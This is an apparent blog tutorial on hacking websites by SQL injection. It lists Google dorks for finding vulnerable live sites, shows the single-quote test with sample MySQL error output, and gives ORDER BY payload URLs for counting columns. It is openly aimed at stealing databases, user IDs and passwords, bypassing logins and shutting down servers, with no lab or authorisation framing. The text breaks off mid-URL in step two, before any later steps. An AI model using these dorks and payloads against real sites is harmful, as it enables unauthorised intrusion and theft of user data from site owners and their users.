After a long time it's my first tutorial on website hacking using
SQL Injection attack with easy and simple steps. I have seen many guys they can't understand SQL Injection method because it's really very hard to understand and Inject Malicious code into URL and get website Database, So here I created SQL Injection tutorial with easy steps and understandable, Hope you all will like it.
✔ What is SQL Injection ?
SQL Injection is one the most popular Web application hacking method. In SQL Injection an attacker find website vulnerability (Vulnerability means Weakness point of website) and Inject Malicious code into URL and get Database of Website and Hack the website this is called SQL Injection attack Exploiting DB (Database) and also SQL Injection Vulnerability Exploitation.
Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.
✔ Requirements :-
SQL Injection Dorks. (Click to download) Skip ad's after 5 Sec
Vulnerable Website. (Use Google to find SQL Injection Vulnerable Website)
Firefox with Hack bar add-on. (Click to download Hackbar add-on)
Little bit understanding of SQL Injection and URL
Fresh Mind to Understand it.
✔ Step 1. Find Vulnerable website.
An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)
Click here to download Huge list of SQL Injection Dorks
Search it on Google for Eg. these are few SQL Injection Vulnerable Dorks. :-
___________
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
________________
Basically I always use Google to search Vulnerable websites.
Here, for tutorial I already have one Vulnerable website (But I can't expose it's name) In this result you will find thousands of websites, the common thing in this search result is all website URL having this type of code at it's end inurl:index.php?id=
Yeah, Definitely it will have because this all website having DB and SQL Injection String and related to SQL Injection Dorks.
For Eg. www.targetwebsite.com/index.php?id=8
✔ How to Check for Vulnerability.
Open any website URL related to SQL Injection Dorks.
Put Single Quote at the End of the website URL ( ' )
Note :- To Check the Vulnerability put sigle Quote ( ' ) at the end of the website URL and Hit Enter.
For Eg. www.targetwebsite.com/index.php?id=2'
If the page remains same or Not found then it's not vulnerable and if the page shows Error like this :-
An error occurred...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/contentPage.php?id=8''' at line 1
An error occurred...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
This means the website is vulnerable to SQL Injection.
✔ Step 2. Find the number of Columns.
Wooo hoo hoo !! We found SQL Injection Vulnerable webstie now it's time to find no. of Columns present in the Database.
To do that replace that one single quote ( ' ) with "Order By no." Statement until you find the Error message.
Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like "Unknown Column"
For Example :- Change it's Order By 1,2,3,4 like below :-
www.targetwebsite.com/index.php?id=8 Order by 1
www.targetwebsite.com/index.php?id=8 Order by 2
www.targetwebsite.com/index.php?id=8 Order by 3
www.targetwebsite.com/index.php?id=8 Order by 4
www.targetwebsite.com/index.php?id=8 Order by 5
And Suppose above Method won't work then use below method :-
www.targetwebsite.com/index.php?id=8 order by 1--
www.targetwebsite.com/index.php?id=8 order by 2--
www.targetwebsite.com/index.php?
No comments:
Post a Comment